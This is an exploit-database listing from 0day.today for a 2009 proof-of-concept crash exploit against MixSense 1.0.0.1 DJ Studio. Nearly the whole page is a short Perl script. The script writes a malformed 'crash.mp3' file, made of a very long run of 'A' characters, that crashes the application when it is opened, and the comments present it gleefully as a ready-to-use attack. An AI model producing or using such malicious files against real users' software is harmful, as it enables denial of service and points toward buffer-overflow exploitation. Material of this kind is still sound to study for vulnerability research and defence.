[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

MixSense 1.0.0.1 DJ Studio (.mp3 file) Crash Exploit

Author
prodigy
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-6923
Category
dos / poc
Date add
15-07-2009
Platform
unsorted
====================================================
MixSense 1.0.0.1 DJ Studio (.mp3 file) Crash Exploit
====================================================


#!/usr/bin/perl -w
#
# MixSense 1.0.0.1 DJ Studio (.mp3 file) Crash Vulnerability Exploit
#
# Founded and exploited by prodigy
# 
# Vendor: MixSense
#
# Usage to reproduce the bug: when you created the malicious file, open with Mixsense and booom!
#
# Platform: Windows
#
###################################################################

==PoC==

use strict;

use diagnostics;

my $file= "crash.mp3";

my $boom= "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" x 5000;

open($FILE,">>$file");

print $FILE "$boom";

close($FILE);

print "File Created successfully\n";




#  0day.today [2024-05-20]  #